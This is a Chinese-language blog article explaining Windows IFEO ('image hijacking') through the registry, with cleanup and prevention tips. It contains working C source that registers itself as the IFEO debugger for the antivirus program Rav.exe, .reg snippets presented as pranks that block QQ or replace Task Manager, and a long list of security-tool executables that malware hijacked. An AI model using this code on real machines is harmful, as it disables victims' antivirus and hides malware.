镜像劫持
所谓的镜像劫持,就是在注册表的[HKEY_local_MACHINE\SOFTWARE\Microsoft\windows NT\ CurrentVersion\Image File execution Options]处新建一个以杀毒软件主程序命名的项,例如Rav.exe。然后再创建一个子键“debugger="C:\WINDOWS\system32\drivers\”。以后只要用户双击 Rav.exe就会运行OSO的病毒文件,类似文件关联的效果。镜像劫持的简单解决方法
如果电脑上有杀毒软件或360什么的但是中了镜像劫持是安全软件无法运行的话,
其实只需要更改一下安全软件的名字就能不被镜像劫持利用,个人认为这是最适合初学者的最简单办法。
首先找到安全软件的位置大部分都放在program files文件夹下。 找到名字例如拿360做例子原文件路径X:\Program Files\360safe原名为360Safe.exe 你把名字改为360123safe.exe(名字什么都行不过就不能是安全软件的名字)然后双击此安全软件就会过镜像劫持开始运行,后面的查杀就不需要说什么了吧。这小操作可以解决燃眉之急啦。
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
int main(int argc, char* argv[])
{
char temp[256];
Dword ret;
LPCTSTR szRegKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"; //定义字符串指针,保存映像劫持的键位
HKEY h_KEY;
if(argc!=1) //如果参数不是1个,提取第2个参数,也就是被劫持程序的路径
{
memset(temp,0,256);
strcpy(temp,argv[1]);
for(int i=0;i<strlen(temp);i++) //将路径中的\换为/,也可以换为\\,就是代码长了点
{
if(temp[i]=='\\')
temp[i]='/';
}
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey,0,KEY_ALL_ACCESS,&h_KEY); //打开注册表中需要映像劫持的子键获得句柄
if(ret==ERROR_SUCCESS)
{
printf("open ok!\n");
if(ERROR_SUCCESS==RegDeleteKey(h_KEY,"rav.exe")) //将上面打开的子键下的rav子键删除
{
printf("delete ok!\n");
RegCloseKey(h_KEY);
winexec(temp,SW_SHOW); //运行被劫持的程序
}
else
{
printf("delete failed!\n");
RegCloseKey(h_KEY);
}
}
else
printf("open failed!\n");
}
memset(temp,0,256);
GetModuleFileName(NULL,temp,256); //得到程序自己的路径,为下面写入注册表做准备
HKEY hResultKey = NULL;
if (ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey, 0, KEY_ALL_ACCESS,&h_KEY)) //打开注册表中映像劫持的子键,获得句柄
{
dword dw;
ret = RegCreateKeyEx(h_KEY,"rav.exe", 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL,&hResultKey, &dw); //在上面打开的子键下创建rav子键并打开,获得句柄
if (ret!=ERROR_SUCCESS)
{
RegCloseKey(h_KEY);
printf("creat failed!\n");
return 1;
}
printf("creat ok!\n");
ret=RegSetValueEx(hResultKey,"debugger",0,REG_SZ,(const BYTE *)temp,strlen(temp)+1); //在rav键上创建debugger键并设置值为本程序的路径用于映像劫持
if(ret!=ERROR_SUCCESS)
{
RegCloseKey(h_KEY);
RegCloseKey(hResultKey);
return 1;
}
RegCloseKey(h_KEY);
RegCloseKey(hResultKey);
printf("set ok!\n");
}
messageBox(NULL,"ok!","成功!",MB_OK); //用于测试程序,可以监视
return 0;
} -----------------------------------------------------------------------------------------------------------------------------
IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定,系统厂商之所以会这么做,是有一定历史原因的,在Windows NT时代,系统使用一种早期的堆栈Heap,由应用程序管理的内存区域)管理机制,使得一些程序的运行机制与现在的不同,而后随着系统更新换代,厂商修改了系统的堆栈管理机制,通过引入动态内存分配方案,让程序对内存的占用更为减少,在安全上也保护程序不容易被溢出,但是这些改动却导致了一些程序从此再也无法运作,为了兼顾这些出问题的程序,微软以“从长计议”的态度专门设计了“IFEO”技术,它的原意根本不是“劫持”,而是“映像文件执行参数”!
一、原理
所谓的映像劫持(IFEO)就是Image File Execution Options,它位于注册表的
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/键值下。由于这个项主要是用来调试程序用的,对一般用户意义不大,默认是只有管理员和local system有权读写修改。
比如我想运行QQ.exe,结果运行的却是FlashGet.exe,这种情况下,qq程序被FLASHGET给劫持了,即你想运行的程序被另外一个程序代替了。
二、被劫持
虽然映像劫持是系统自带的功能,对一般用户来说根本没什么用的必要,但是就有一些病毒通过映像劫持来做文章,表面上看起来是运行了一个正常的程序,实际上病毒已经在后台运行了。
大部分的病毒和木马都是通过加载系统启动项来运行的,也有一些是注册成为系统服务来启动,他们主要通过修改注册表来实现这个目的,主要有以下几个键值:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/WindowsCurrent/Version/Run
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Windows/APPInit_DLLs
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/winlogon/Notify
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/WindowsCurrent/Version/runonce
HKEY_LOCAL_MACHINE/Software/Microsoft/WindowsCurrent/Version/RunServicesOnce
但是与一般的木马,病毒不同的是,就有一些病毒偏偏不通过这些来加载自己,不随着系统的启动运行。木马病毒的作者抓住了一些用户的心理,等到用户运行某个特定的程序的时候它才运行。因为一般的用户,只要发觉自己的机子中了病毒,首先要察看的就是系统的加载项,很少有人会想到映像劫持,这也是这种病毒高明的地方。
映像劫持病毒主要通过修改注册表中的HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/项来劫持正常的程序,比如有一个病毒 vires.exe 要劫持qq程序,它会在上面注册表的位置新建一个qq.exe项,再在这个项下面新建一个字符串的键 debugger把其值改为C:/WINDOWS/SYSTEM32/VIRES.EXE(这里是病毒藏身的目录)即可。
三、玩劫持
1、禁止某些程序的运行
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/qq.exe]
Debugger=123.exe
把上面的代码保存为norun_qq.reg,双击导入注册表,每次双击运行QQ的时候,系统都会弹出一个框提示说找不到QQ,原因就QQ被重定向了。如果要让QQ继续运行的话,把123.exe改为其安装目录就可以了。
2、偷梁换柱恶作剧
每次我们按下CTRL+ALT+DEL键时,都会弹出任务管理器,想不想在我们按下这些键的时候让它弹出命令提示符窗口,下面就教你怎么玩:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/taskmgr.exe]
Debugger=D:/WINDOWS/pchealth/helpctr/binaries/mconfig.exe
将上面的代码另存为 task_cmd.reg,双击导入注册表。按下那三个键打开了“系统配置实用程序”。
3、让病毒迷失自我
同上面的道理一样,如果我们把病毒程序给重定向了,是不是病毒就不能运行了,答案是肯定的。
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sppoolsv.exe]
Debugger=123.exe
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/logo_1.exe]
Debugger=123.exe
上面的代码是以金猪病毒和威金病毒为例,这样即使这些病毒在系统启动项里面,即使随系统运行了,但是由于映象劫持的重定向作用,还是会被系统提示无法找到病毒文件(这里是logo_1.exe和sppoolsv.exe)。
四、防劫持
1、权限限制法
打开注册表编辑器,定位到
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/,选中该项,右键→权限→高级,取消adMinistrator和system用户的写权限即可。
2、快刀斩乱麻法
打开注册表编辑器,定位到[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/,把“Image File Execution Options”项删除即可。
总结:以上关于映像劫持的解析与利用但愿对于大家查杀木马病毒有所帮助,也希望大家能够挖掘更多更实用的功能。
映像胁持的基本原理:
NT系统在试图执行一个从命令行调用的可执行文件运行请求时,先会检查运行程序是不是可执行文件,如果是的话,再检查格式的,然后就会检查是否存在。。如果不存在的话,它会提示系统找不到文件或者是“指定的路径不正确等等。。
当然,把这些键删除后,程序就可以运行!
映像胁持的具体案例:
蔚为壮观的IFEO,稍微有些名气的都挂了:
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/avp.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/AgentSvr.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/CCenter.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/Rav.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/RavMonD.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/RavStub.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/RavTask.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/rfwcfg.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/rfwsrv.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/RsAgent.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/Rsaupd.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/runiep.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/SmartUp.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/FileDsty.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/RegClean.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/360tray.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/360Safe.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/360rpt.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/kabaload.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/safelive.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/Ras.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KASMain.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KASTask.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KAV32.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KAVDX.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KAVStart.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KISLnchr.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KMailMon.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KMFilter.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KPFW32.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KPFW32X.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KPFWSvc.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KWatch9x.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KWatch.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KWatchX.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/TrojanDetector.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/UpLive.EXE.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KVSrvXP.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KvDetect.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KRegEx.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/kvol.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/kvolself.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/kvupload.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/kvwsc.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/UIHost.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/IceSword.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/iparmo.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/mmsk.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/adam.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/MagicSet.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/PFWLiveUpdate.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/SREng.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/WoptiClean.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/scan32.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/shcfg32.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/mcconsol.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/HijackThis.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/mmqczj.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/Trojanwall.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/FTCleanerShell.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/loaddll.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/rfwProxy.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KsLoader.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KvfwMcl.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/autoruns.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/AppSvc32.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ccSvcHst.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/isPwdSvc.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/symlcsvc.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/nod32kui.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/avgrssvc.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/RfwMain.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KAVPFW.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/Iparmor.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/nod32krn.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/PFW.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/RavMon.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/KAVSetup.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/NAVSetup.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/SysSafe.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/QHSET.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/zxsweep.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/Avmonitor.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/UmxCfg.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/UmxFwHlp.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/UmxPol.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/UmxAgent.exe
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/Umxattachment.exe
-------------------------------------------------------
从这个案例,我们可以看到这个技术的强大之处!很多的杀软进程和一些辅助杀软或工具,全部被胁持,导致你遇到的所有杀软都无法运行!
试想如果更多病毒,利用于此,将是多么可怕的事情!
应用举例:
1.病毒清除和防范
2.网吧网管 防止顾客关闭管理软件,可将“任务管理器”劫持为IE浏览器,封锁一些黑客软件等等。
3.恶作剧,在MM面前SHOW一番。
相关阅读
统一格式前注: ‘’‘’标题对应《编程之美》题号思路:包括解题思路和编程中的技巧教训:编程过程中需要注意的地方以及存在的惯性错
iOS12将要面世,而关于苹果的系统还停留在iOS11,毕竟相比以前,这一系统有不少的新鲜感,苹果的屏幕镜像功能也是其一大特点,我们都知道利
素材程序数字0~9 #include <graphics.h> #include <conio.h> void pOne(int x, int y) { setlinecolor(WHITE); solidcircle(x
文章目录引言OSI 七层网络模型物理层数据链路层网络层传输层会话层表达层应用层TCP/IP 四层模型IP 协议TCP 协议TCP 的三次握手与
socket编程是网络常用的编程,我们通过在网络中创建socket关键字来实现网络间的通信,通过收集大量的资料,通过这一章节,充分的了解sock